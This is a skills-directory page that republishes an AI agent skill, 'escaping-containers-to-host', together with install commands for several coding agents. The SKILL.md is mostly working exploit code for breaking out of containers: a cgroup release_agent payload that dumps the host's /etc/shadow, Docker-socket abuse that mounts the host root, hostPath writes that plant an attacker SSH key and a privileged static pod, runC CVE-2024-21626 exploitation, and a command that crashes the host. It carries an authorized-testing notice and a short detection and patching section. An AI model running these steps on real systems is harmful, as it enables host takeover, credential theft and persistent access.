Container Security
hardw00t/ai-security-arsenal
Container and Kubernetes security assessment — image vulnerability scanning, SBOM diff analysis, K8s cluster auditing, RBAC privilege mapping, NetworkPolicy review, container escape testing, and…
Exploits privileged pods, host mounts, runC CVEs, and exposed Docker sockets to break out of a container and reach the underlying host during an authorized container-security assessment.
$ npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill escaping-containers-to-host -a claude-codeProject install by default; add -g for ~/.claude/skills/.
$ gh skill install mukul975/Anthropic-Cybersecurity-Skills escaping-containers-to-host --agent claude-codeProject scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).
$ git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/escaping-containers-to-host .claude/skills/escaping-containers-to-host && rm -rf skills-srcUse ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.
Claude Code skills documentation · loads skills from .claude/skills/
Install the "escaping-containers-to-host" agent skill from https://github.com/mukul975/Anthropic-Cybersecurity-Skills/tree/main/skills/escaping-containers-to-host into .claude/skills/escaping-containers-to-host/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "escaping-containers-to-host", then confirm the skill loads.Claude Code copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$skill-installer install https://github.com/mukul975/Anthropic-Cybersecurity-Skills/tree/main/skills/escaping-containers-to-hostType this inside Codex. $skill-installer <name> installs a curated skill from openai/skills. The installer writes to $CODEX_HOME/skills (default ~/.codex/skills). Restart Codex if the skill does not show up.
$ npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill escaping-containers-to-host -a codexProject install goes to .agents/skills/; add -g for ~/.codex/skills/.
$ gh skill install mukul975/Anthropic-Cybersecurity-Skills escaping-containers-to-host --agent codexProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git skills-src && mkdir -p .agents/skills && cp -r skills-src/skills/escaping-containers-to-host .agents/skills/escaping-containers-to-host && rm -rf skills-srcUse ~/.agents/skills/ instead of .agents/skills for a personal install.
Codex skills documentation · loads skills from .agents/skills/
Install the "escaping-containers-to-host" agent skill from https://github.com/mukul975/Anthropic-Cybersecurity-Skills/tree/main/skills/escaping-containers-to-host into .agents/skills/escaping-containers-to-host/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "escaping-containers-to-host", then confirm the skill loads.Codex copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill escaping-containers-to-host -a cursorProject install goes to .agents/skills/; add -g for ~/.cursor/skills/.
$ gh skill install mukul975/Anthropic-Cybersecurity-Skills escaping-containers-to-host --agent cursorProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git skills-src && mkdir -p .cursor/skills && cp -r skills-src/skills/escaping-containers-to-host .cursor/skills/escaping-containers-to-host && rm -rf skills-srcUse ~/.cursor/skills/ instead of .cursor/skills for a personal install.
Cursor skills documentation · loads skills from .cursor/skills/, .agents/skills/, .claude/skills/, .codex/skills/
Install the "escaping-containers-to-host" agent skill from https://github.com/mukul975/Anthropic-Cybersecurity-Skills/tree/main/skills/escaping-containers-to-host into .cursor/skills/escaping-containers-to-host/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "escaping-containers-to-host", then confirm the skill loads.Cursor copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gemini skills install https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git --path skills/escaping-containers-to-host--scope user (default) or --scope workspace; --path is the subfolder of the repo that holds the skill; --consent skips the security confirmation prompt.
$ npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill escaping-containers-to-host -a gemini-cliProject install goes to .agents/skills/; add -g for ~/.gemini/skills/.
$ gh skill install mukul975/Anthropic-Cybersecurity-Skills escaping-containers-to-host --agent gemini-cliProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git skills-src && mkdir -p .gemini/skills && cp -r skills-src/skills/escaping-containers-to-host .gemini/skills/escaping-containers-to-host && rm -rf skills-srcUse ~/.gemini/skills/ instead of .gemini/skills for a personal install, then run /skills reload.
Gemini CLI skills documentation · loads skills from .gemini/skills/, .agents/skills/
Install the "escaping-containers-to-host" agent skill from https://github.com/mukul975/Anthropic-Cybersecurity-Skills/tree/main/skills/escaping-containers-to-host into .gemini/skills/escaping-containers-to-host/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "escaping-containers-to-host", then confirm the skill loads.Gemini CLI copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gh skill install mukul975/Anthropic-Cybersecurity-Skills escaping-containers-to-hostInstalls for Copilot at project scope by default; add --scope user for a personal install. Preview a skill first with gh skill preview. Needs GitHub CLI 2.90.0 or later (public preview).
$ npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill escaping-containers-to-host -a github-copilotProject install goes to .agents/skills/; add -g for ~/.copilot/skills/.
$ git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git skills-src && mkdir -p .github/skills && cp -r skills-src/skills/escaping-containers-to-host .github/skills/escaping-containers-to-host && rm -rf skills-srcUse ~/.copilot/skills/ instead of .github/skills for a personal install. Commit .github/skills so cloud agent and code review can use it.
GitHub Copilot skills documentation · loads skills from .github/skills/, .claude/skills/, .agents/skills/
Install the "escaping-containers-to-host" agent skill from https://github.com/mukul975/Anthropic-Cybersecurity-Skills/tree/main/skills/escaping-containers-to-host into .github/skills/escaping-containers-to-host/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "escaping-containers-to-host", then confirm the skill loads.GitHub Copilot copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill escaping-containers-to-host -a opencodeOpenCode documents no install command of its own. Project install goes to .agents/skills/; add -g for ~/.config/opencode/skills/.
$ gh skill install mukul975/Anthropic-Cybersecurity-Skills escaping-containers-to-host --agent opencodeProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git skills-src && mkdir -p .opencode/skills && cp -r skills-src/skills/escaping-containers-to-host .opencode/skills/escaping-containers-to-host && rm -rf skills-srcUse ~/.config/opencode/skills/ instead of .opencode/skills for a personal install.
OpenCode skills documentation · loads skills from .opencode/skills/, .claude/skills/, .agents/skills/
Install the "escaping-containers-to-host" agent skill from https://github.com/mukul975/Anthropic-Cybersecurity-Skills/tree/main/skills/escaping-containers-to-host into .opencode/skills/escaping-containers-to-host/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "escaping-containers-to-host", then confirm the skill loads.OpenCode copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
escaping-containers-to-hostExploits privileged pods, host mounts, runC CVEs, and exposed Docker sockets to break out of a container and reach the underlying host during an authorized container-security assessment.
Escaping Containers To Host is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Exploits privileged pods, host mounts, runC CVEs, and exposed Docker sockets to break out of a container and reach the underlying host during an authorized container-security assessment. Use when executing an approved breakout test, demonstrating the real impact of a privileged or hostPath workload, or validating that escape mitigations actually hold. Keywords: container breakout, privileged, hostPath, docker.sock, runC CVE-2019-5736, CVE-2024-21626, releaseagent, nsenter. Do not use for defensive detection of…
Its SKILL.md is about 3.4k tokens, which your agent loads only when the skill is triggered. The skill folder holds 6 other files, including scripts and reference files (for example `references/api-reference.md`, `references/standards.md` and `scripts/agent.py`).
It sits in Security, covering Vulnerability scanning, Containers and Cloud security. It works with Docker. The repository describes itself as: 817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io…. The licence is Apache-2.0.
7 steps, taken from the step headings in SKILL.md.
Read from SKILL.md and the folder at commit 54a7988. It shows what the files ask for, not the result of running them.
Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.
From allowed-tools in the SKILL.md frontmatter.
Ships 1 file in scripts/ (Python), which the agent can run.
Shell commands in SKILL.md call:
dockercurlshgitkubectlFrom the folder's file list and the shell code blocks in SKILL.md.
Hosts in commands or code, which the agent is likely to contact:
github.comAlso links to:
sysdig.compaloaltonetworks.comFrom URLs in SKILL.md, links to its own repository left out.
Names no API keys, tokens, secrets or passwords.
From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.
Escaping Containers To Host loads about 3.4k tokens when it runs, and up to ~4.6k if it reads all its reference files. Until then it costs about 151 tokens; SKILL.md has 872 words of instructions outside code blocks.
Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.
The automated check found no risky patterns in SKILL.md.
Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); the scripts in this folder are not scanned.
The full file from mukul975/Anthropic-Cybersecurity-Skills at commit 54a7988, republished under its Apache-2.0 licence (© mukul975). 872 words, ~3,396 tokens.
.claude/skills/escaping-containers-to-host/SKILL.md (or your agent's skills folder). This skill also uses 4 other files; get the full folder from GitHub.Legal Notice: This skill is for authorized security testing and educational purposes only. Container breakout grants full host compromise. Only run these techniques against systems you own or have explicit written authorization to test. Unauthorized use is illegal and may violate computer fraud laws.
Container escape (MITRE ATT&CK T1611, Escape to Host) is the act of breaking the isolation boundary between a container and the host operating system, giving an attacker code execution in the host namespace — and, on Kubernetes, frequently a route to the entire node and then the cluster. Containers share the host kernel and rely on namespaces, cgroups, capabilities, seccomp, and LSMs (AppArmor/SELinux) for isolation. When any of these controls are weakened (a --privileged container, a mounted Docker socket, a hostPath mount of /, excess Linux capabilities such as CAP_SYS_ADMIN) or when a runtime contains a vulnerability, that boundary collapses.
This skill covers the four highest-impact, real-world escape primitives observed by Sysdig, Unit 42, and the runC maintainers:
CAP_SYS_ADMIN, host PID/IPC/Network namespaces, and hostPath mounts./var/run/docker.sock) — mounting the daemon socket into a container hands an attacker root on the host via a new privileged container./proc/self/fd/7/8) referencing the host filesystem before pivot_root; setting the container working directory to that fd lands the process on the host. Patched in runC 1.1.12 (containerd 1.6.28/1.7.13, Docker 25.0.2)./dev/null, /dev/console, and other bind mounts performed before runC applies maskedPaths/readonlyPaths, allowing read-write access to /proc entries (e.g. /proc/sysrq-trigger, core_pattern) and arbitrary write redirection. Patched in runC 1.2.8, 1.3.3, and 1.4.0-rc.3.Sources: Palo Alto Networks "Leaky Vessels" advisory; Sysdig "New runc vulnerabilities allow container escape" (2025); opencontainers/runc security advisories GHSA-cgrx-mc8f-2prm and GHSA-9493-h29p-rfm2; Unit 42 container-escape research.
# deepce - Docker enumeration and escape
git clone https://github.com/stealthcopter/deepce.git
# amicontained - container introspection (capabilities, seccomp, namespaces)
curl -L https://github.com/genuinetools/amicontained/releases/download/v0.4.9/amicontained-linux-amd64 -o amicontained
chmod +x amicontained
# CDK - zero-dependency K8s/container pentest toolkit
curl -L https://github.com/cdk-team/CDK/releases/latest/download/cdk_linux_amd64 -o cdk
chmod +x cdk/etc/shadow access, or a host file write)| Technique ID | Name | Tactic |
|---|---|---|
| T1611 | Escape to Host | Privilege Escalation |
| T1610 | Deploy Container | Defense Evasion / Execution |
| T1613 | Container and Resource Discovery | Discovery |
| T1068 | Exploitation for Privilege Escalation | Privilege Escalation |
Determine privilege level, capabilities, namespaces, and mounted host paths.
# Quick capability + namespace + seccomp introspection
./amicontained
# Are we privileged? CapEff ending in ...ffffffff is "all caps"
grep CapEff /proc/self/status
capsh --decode=$(grep CapEff /proc/self/status | awk '{print $2}')
# Host filesystem or docker socket mounted in?
mount | grep -E 'docker.sock|hostPath|/host'
ls -la /var/run/docker.sock 2>/dev/null
findmnt -o TARGET,SOURCE,FSTYPE,OPTIONS
# Sharing host namespaces? (host PID = can see host processes)
ps aux | head # if you see systemd/host pids, hostPID:true
ls -la /proc/1/root # if readable as host root, namespace is shared
# Automated enumeration
./deepce.sh
./cdk evaluateA --privileged container (or one with CAP_SYS_ADMIN) can mount a cgroup hierarchy and abuse the release_agent to run a command on the host when the last process in a cgroup exits.
# Confirm we can mount (CAP_SYS_ADMIN present)
# Create a cgroup mount and enable release_agent notification
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp 2>/dev/null || \
mount -t cgroup -o memory cgroup /tmp/cgrp
mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
# Find the container rootfs path on the host
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab | head -1)
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Payload that runs on the HOST
cat > /cmd <<'EOF'
#!/bin/sh
ps aux > /output
hostname >> /output
cat /etc/shadow >> /output
EOF
chmod +x /cmd
# Trigger: spawn and immediately exit a process in the cgroup
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
cat /output # host process list / shadow proves escapeIf /var/run/docker.sock is bind-mounted into the container, you control the host Docker daemon and can launch a new container that mounts the host root.
# Confirm reachability
docker -H unix:///var/run/docker.sock version 2>/dev/null || \
curl -s --unix-socket /var/run/docker.sock http://localhost/version
# Launch a privileged container mounting host / and chroot into it
docker -H unix:///var/run/docker.sock run -it --rm \
--privileged --net=host --pid=host \
-v /:/host alpine chroot /host sh
# Pure-curl variant (no docker CLI in container):
curl -s -XPOST --unix-socket /var/run/docker.sock \
-H "Content-Type: application/json" \
-d '{"Image":"alpine","Cmd":["/bin/sh","-c","cat /host/etc/shadow"],
"Binds":["/:/host"],"Privileged":true}' \
http://localhost/containers/create?name=esc
curl -s -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/esc/startA pod with a hostPath volume of / (or a sensitive host dir) lets you read/write host files directly — e.g., drop a root SSH key or a privileged static pod manifest.
# If /host is the hostPath mount of node root:
ls /host
# Persist: add an attacker key for node root login
mkdir -p /host/root/.ssh
echo "ssh-ed25519 AAAA... attacker@kali" >> /host/root/.ssh/authorized_keys
# Or write a privileged static pod manifest that kubelet will auto-run as root
cat > /host/etc/kubernetes/manifests/pwn.yaml <<'EOF'
apiVersion: v1
kind: Pod
metadata: {name: pwn, namespace: kube-system}
spec:
hostPID: true
containers:
- name: pwn
image: alpine
command: ["/bin/sh","-c","sleep 1d"]
securityContext: {privileged: true}
volumeMounts: [{name: host, mountPath: /host}]
volumes: [{name: host, hostPath: {path: /}}]
EOFIf the runtime is runC <= 1.1.11, the leaked host-cwd fd can be used. With docker build/docker run control, set the working directory to /proc/self/fd/<N> (commonly 7 or 8).
# Detect vulnerable runtime version (host or via runc binary in image)
runc --version # vulnerable: 1.0.0-rc93 .. 1.1.11
docker info --format '{{.DefaultRuntime}}'
# Proof-of-concept via a malicious image WORKDIR (run-time variant)
cat > Dockerfile <<'EOF'
FROM alpine
# fd 7/8 leaked by runc references the HOST cwd before pivot_root
WORKDIR /proc/self/fd/8
RUN ["/bin/sh","-c","cd ../../../../ ; cat etc/shadow ; cat etc/hostname"]
EOF
docker build --no-cache -t leaky .
# Run-time variant: the container lands in a host directory
docker run --rm --workdir /proc/self/fd/8 alpine \
sh -c 'cd ../../../.. && cat etc/shadow'
# Reference PoC: github.com/strikoder/cve-2024-21626-runc-1.1.11-escapeFor runC <= 1.2.7 / 1.3.2 / 1.4.0-rc.2, CVE-2025-31133/52565/52881 abuse a race between the /dev/null//dev/console bind mount and the application of maskedPaths, replacing the mount target with a symlink so a host /proc entry becomes writable. Writing core_pattern or /proc/sysrq-trigger yields host code execution.
# Confirm vulnerable runtime
runc --version # vulnerable: <= 1.2.7, 1.3.2, 1.4.0-rc.2
# Conceptual exploitation flow (use maintainers' PoC in a lab):
# 1. Start a container that, during init, swaps the /dev/console (or a
# custom device) bind-mount target for a symlink to /proc/sysrq-trigger.
# 2. Win the race so runc bind-mounts it read-write before maskedPaths apply.
# 3. Redirect a write to host procfs:
echo c > /proc/sysrq-trigger # would crash host (DoS) - demonstrates RW
# 4. For code exec, redirect the write to /proc/sys/kernel/core_pattern:
echo '|/bin/sh -c "id>/host_pwn"' > /proc/sys/kernel/core_pattern
# then trigger a core dump in any host-visible process.
# Advisories: GHSA-cgrx-mc8f-2prm, GHSA-9493-h29p-rfm2# Verify runtimes are patched
runc --version # want >= 1.2.8 / 1.3.3 / 1.4.0-rc.3 (and != vuln 1.1.x)
docker version --format '{{.Server.Version}}' # >= 25.0.2 for CVE-2024-21626
containerd --version # >= 1.6.28 / 1.7.13
# Confirm hardening for misconfig escapes
docker inspect <ctr> --format '{{.HostConfig.Privileged}}' # want false
kubectl get pod <pod> -o jsonpath='{.spec.containers[*].securityContext}'| Tool | Purpose | Source |
|---|---|---|
| amicontained | Capability/namespace/seccomp introspection | https://github.com/genuinetools/amicontained |
| deepce | Docker enumeration & escape automation | https://github.com/stealthcopter/deepce |
| CDK | Container/K8s penetration toolkit | https://github.com/cdk-team/CDK |
| runc PoC (CVE-2024-21626) | Leaky Vessels reference exploit | https://github.com/strikoder/cve-2024-21626-runc-1.1.11-escape |
| Sysdig runc 2025 advisory | CVE-2025-31133/52565/52881 analysis | https://www.sysdig.com/blog/runc-container-escape-vulnerabilities |
| Palo Alto Leaky Vessels | CVE-2024-21626 deep dive | https://www.paloaltonetworks.com/blog/cloud-security/leaky-vessels-vulnerabilities-container-escape/ |
| Primitive | Root Cause | Detection Signal |
|---|---|---|
| Privileged container | --privileged / CAP_SYS_ADMIN | mount of cgroup, write to release_agent |
| Docker socket mount | /var/run/docker.sock bind-mounted | Daemon API call from a container |
hostPath / mount | Pod mounts node root | Write to /host/etc/kubernetes/manifests |
| CVE-2024-21626 | runC fd leak before pivot_root | WORKDIR/cwd =/proc/self/fd/N |
| CVE-2025-31133/52565/52881 | procfs write redirect via mount race | RW mount of /dev/console, write to /proc/sysrq-trigger |
/etc/shadow / host file write captured)© mukul975, Apache-2.0. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file
SKILL.md and 4 other files (scripts, references) in skills/escaping-containers-to-host of mukul975/Anthropic-Cybersecurity-Skills.
Open the folder on GitHubat commit 54a7988
Escaping Containers To Host next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.
| Skill | Stars | Used in | Tokens | Auto-check | Licence | Repo updated |
|---|---|---|---|---|---|---|
| Escaping Containers To Host this skillmukul975/Anthropic-Cybersecurity-Skills | 34k | — | ~3.4k | Automated safety check: Pass | Apache-2.0 | |
| Container Securityhardw00t/ai-security-arsenal | 105 | — | ~2.8k | Automated safety check: Pass | None | |
| Container Security Hardeningsickn33/agentic-awesome-skills | 47k | 1 repos | ~1k | Automated safety check: Notes | MIT | |
| Security Analyzeraiskillstore/marketplace | 433 | — | ~1.2k | Automated safety check: Notes | None | |
| Cyberowlaikarimhabush/cyberowl | 263 | — | ~2.5k | Automated safety check: Pass | MIT | |
| Warp Vulnerability Triagewarpdotdev/warp | 65k | 1 repos | ~2.1k | Automated safety check: Pass | AGPL-3.0 |
hardw00t/ai-security-arsenal
Container and Kubernetes security assessment — image vulnerability scanning, SBOM diff analysis, K8s cluster auditing, RBAC privilege mapping, NetworkPolicy review, container escape testing, and…
sickn33/agentic-awesome-skills
Harden Docker/container images and runtime deployments with secure base images, non-root users, CVE scanning, SBOM/signing, seccomp/AppArmor, and Kubernetes pod security controls.
aiskillstore/marketplace
Comprehensive security vulnerability analysis for codebases and infrastructure.
karimhabush/cyberowl
Check if recent cybersecurity alerts from 10 international CERTs affect your current project.
warpdotdev/warp
Gathers security findings from Dependabot, GCP container scanning, Docker Scout and Linear security issues, then triages and remediates them across Warp's repos and images.
AgentSecOps/SecOpsAgentKit
Scans container images, filesystems and SBOMs with Grype for known vulnerabilities, ranks them by CVSS, EPSS and CISA KEV, and wires scans into CI/CD thresholds.
mukul975/Anthropic-Cybersecurity-Skills
Weighs infrastructure, TTP, malware code and timing evidence with the Diamond Model and competing hypotheses to reach a confidence-rated attribution.
mukul975/Anthropic-Cybersecurity-Skills
Walks through reverse engineering Go-compiled malware in Ghidra: parsing buildinfo and pclntab, recovering stripped function names and extracting dependencies.
mukul975/Anthropic-Cybersecurity-Skills
Guides forensic analysis of Windows LNK shortcut files and Jump Lists with LECmd, JLECmd and manual parsing to show file access and program execution.
mukul975/Anthropic-Cybersecurity-Skills
Hunts Windows malware persistence with Sysinternals Autoruns, covering run keys, services, scheduled tasks and drivers, with baseline comparison.
mukul975/Anthropic-Cybersecurity-Skills
Guides a Windows forensic examination of the NTFS Master File Table to recover deleted-file evidence, build timelines and spot timestomping.
mukul975/Anthropic-Cybersecurity-Skills
Detects DNS tunneling, ICMP exfiltration and HTTP-based covert channels in packet captures and DNS logs when hunting for hidden command-and-control traffic.
Works with
Categories
Exploits privileged pods, host mounts, runC CVEs, and exposed Docker sockets to break out of a container and reach the underlying host during an authorized container-security assessment. Escaping Containers To Host is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Exploits privileged pods, host mounts, runC CVEs, and exposed Docker sockets to break out of a container and reach the underlying host during an authorized container-security assessment.
Escaping Containers To Host fits situations like: executing an approved breakout test; demonstrating the real impact of a privileged; hostPath workload; validating that escape mitigations actually hold.
Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill escaping-containers-to-host -a claude-code`. Or copy the skill folder (skills/escaping-containers-to-host in mukul975/Anthropic-Cybersecurity-Skills) into .claude/skills/escaping-containers-to-host in your project. Claude Code loads it when a task matches its description.
Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill escaping-containers-to-host -a codex`. Or copy the skill folder (skills/escaping-containers-to-host in mukul975/Anthropic-Cybersecurity-Skills) into .agents/skills/escaping-containers-to-host in your project. Codex loads it when a task matches its description.
Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill escaping-containers-to-host -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/escaping-containers-to-host, .gemini/skills/escaping-containers-to-host, .github/skills/escaping-containers-to-host and .opencode/skills/escaping-containers-to-host in your project.
Going by SKILL.md and its folder, Escaping Containers To Host needs Python for the scripts in its folder and the command-line tools its instructions call (docker, curl, sh, git and kubectl). Our summary lists: Python 3; Docker.
SKILL.md names 3 domains. In commands or code: github.com; the agent is likely to contact it when it follows the instructions. As links in the text: sysdig.com and paloaltonetworks.com. This is read from the text; nothing was executed.
Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. The check reads SKILL.md only: the scripts in the folder are not scanned, so read them before running anything.
Escaping Containers To Host is published under the Apache-2.0 licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.
About 3.4k tokens (SKILL.md is roughly 14k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full. Its references folder adds about 1.2k tokens, read only when the agent opens those files.
Skills that share tags, products or a category with Escaping Containers To Host: Container Security (hardw00t/ai-security-arsenal, 105 stars), Container Security Hardening (sickn33/agentic-awesome-skills, 47k stars), Security Analyzer (aiskillstore/marketplace, 433 stars) and Cyberowlai (karimhabush/cyberowl, 263 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.
mukul975 (a GitHub user) maintains it in mukul975/Anthropic-Cybersecurity-Skills, which has 34,116 GitHub stars. The repository holds 644 skills in this directory. The repository was last updated on August 31, 2026.
Source: mukul975/Anthropic-Cybersecurity-Skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.